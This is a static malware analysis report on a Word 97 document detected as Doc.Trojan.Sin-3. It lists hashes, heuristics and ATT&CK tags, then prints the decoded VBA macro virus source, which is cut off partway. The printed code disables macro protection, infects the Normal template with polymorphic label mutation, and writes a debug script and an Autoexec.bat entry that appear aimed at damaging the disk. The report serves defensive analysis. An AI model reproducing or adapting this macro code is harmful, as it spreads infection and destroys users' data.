Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 362ad1f2e918b10b…

MALICIOUS

Office (OLE)

Size: 261.5 KB
Created: 1998-10-11 13:46:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 30bf89542a2628a482c01f1116dab785
SHA-1: 9b4b81f37b41f5268fa4f4977cf601839cdb8027
SHA-256: 362ad1f2e918b10b4fba3abb04bf1070f5ff96aca0ea4c80c30ef027103e379c
Risk Score: 180

Malware Insights

MITRE ATT&CK
T1059.005 (Visual Basic), T1566.001 (Spearphishing Attachment)

The sample contains a VBA macro that executes when the document is opened, as indicated by the 'Document_Open' macro firing. This macro attempts to write a script to 'C:\Demon.scr' and append commands to 'C:\Autoexec.bat', likely to download and execute a secondary payload. The ClamAV detection 'Doc.Trojan.Sin-3' further supports its malicious nature.

Heuristics (3)

  • ClamAV: Doc.Trojan.Sin-3 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Sin-3
  • VBA macros detected (severity: medium, 1 related finding, rule: OLE_VBA_MACROS)
    Document contains VBA macro code
  • Document_Open macro (severity: high, rule: OLE_VBA_DOCOPEN)
    Document contains a Document_Open macro, which runs automatically when the document is opened

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 15913 bytes
SHA-256: 197c97faa405d421de27f33bd9dba3369ed04b897629704719da13a2e2f9a135
Detection: ClamAV: Doc.Trojan.Sin-3
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
ICheck = True
PRSWDDVQXO:          Options.VirusProtection = False
QFEHHO:          Randomize Timer
PJINRABRK:           ActInstalled = False
JVTEXSBBO:          Set ActCarrier = ActiveDocument.VBProject.VBComponents(1).CodeModule
COCJDH:          Set NormCarrier = NormalTemplate.VBProject.VBComponents(1).CodeModule
DNDMIXDBGS:
NCSEFPU:          NI = NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(3, 1)
MDKFFRP:          AI = ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(3, 1)
EPYVTAIMGWX:
SJXEXX:          If UCase(NI) = "ICHECK = TRUE" Then NormInstalled = True
GTLVMKUDNPJ:          If UCase(AI) = "ICHECK = TRUE" Then ActInstalled = True
KEHVNSE:
XUFXDXFCO:          If NormInstalled = False Then
DIAOTPT:              Set Infection = NormCarrier
SNFFNPQEG:              Set Carrier = ActCarrier
KGBUFG:          Else
GQDGXBR:              Set Infection = ActCarrier
FPDAXRGSU:              Set Carrier = NormCarrier
QOPHEKXS:          End If
ACXORCSXWH:
CFVEBOO:          If NormInstalled = True And ActInstalled = True Then
HSHEKWAAFSR:              If Int(Rnd * 24) > CInt(Hour(Time)) Then
XMBTVRUNT:              IAddressI = Int(Rnd * 9999): Open "C:\Demon.scr" For Output As #1
YWOXNWTU:              Print #1, "w " & IAddressI & " 02 01 02": Open "C:\Autoexec.bat" For Append As #2
ATRHTYWP:              Print #1, "q"
JBPEEWNJ:              Print #2, "debug <demon.scr"
CPFGMR:              Close
COMVWFYSS:              End If
AIYYDGOH:          End If
PBPGJG:
VXVHGXTDCH:          With Carrier
DHSFYUAVPKC:          UECode1 = .Lines(1, 1) & Chr(13)
JDCCBCLMOTV:          UECode2 = .Lines(2, 1) & Chr(13)
HKQPMOI:          UECode3 = .Lines(3, 1) & Chr(13)
YAOFDXXF:          UECode = UECode1 & UECode2 & UECode3
FQMFGS:          For X = 5 To .CountOfLines - 1
QSHTNQCRXAK:              VCCode = .Lines(X, 1)
NFDUEAATV:              If VCCode = "End Sub" Then Exit For
HNXINGRSS:              For I = 1 To 20
TYMDLUVXOUV:                  If Mid(VCCode, I, 1) = ":" Then VCCode = Right(VCCode, Len(VCCode) - I)
EHVSCARXAGG:              Next I
MMLFSTFP:              factor = ""
QTOHLGMQOQI:              For Y = 1 To Int(Rnd * 6) + 6
DQSETFS:                  factor = factor & Chr(Int(Rnd * 25) + 65)
BXGFNALFQ:              Next Y
QIMSFYXM:              make_morph = factor & ": "
OCKCWXRGUD:
EHHMRKF:              VirCode = VirCode & make_morph & " " & VCCode & Chr(13)
YCSHNNHAAIM:          Next X
MRDUETBCWL:          VirCode = UECode & VirCode & "End Sub"
MIGGCFOITVF:          End With
FUWVJAI:
ABMNNOWS:          With Infection
DKROFG:              .DeleteLines 1, .CountOfLines
XKCQGBN:              .InsertLines 1, VirCode
FXUXJGVB:          End With
YIYFIDGQN:
LEUHNDS:          StealthModul = "by Lord Arz"
YAQXONMT:          ResetMe = "Private Sub Document_Close()" & Chr(13)
RTVORVPI:          ResetMe = ResetMe & "Beginn:                                                                                                                                                                                                                                                        If ShowVisualBasicEditor = True Then Normal.ThisDocument.Variables(" & Chr(34) & "VCode" & Chr(34) & ").Value = (" & Chr(34) & "Msgbox " & Chr(34) & Chr(34) & "Seven deadly sins, seven ways to win, seven holy path to hell, seven downward slopes, seven blodied hopes, seven are your burnig fires, seven your desires...." & Chr(34) & ")" & Chr(13)
NKWEQDXWG:          ResetMe = ResetMe & "With ThisDocument.VBProject.VBComponents(1).CodeModule" & Chr(13)
JUTTASR:          ResetMe = ResetMe & ".DeleteLines 1, .CountOfLines" & Chr(13)
AGABUAO:          ResetMe = ResetMe & ".InsertLines 1, ThisDocument.Variables(1
... (truncated)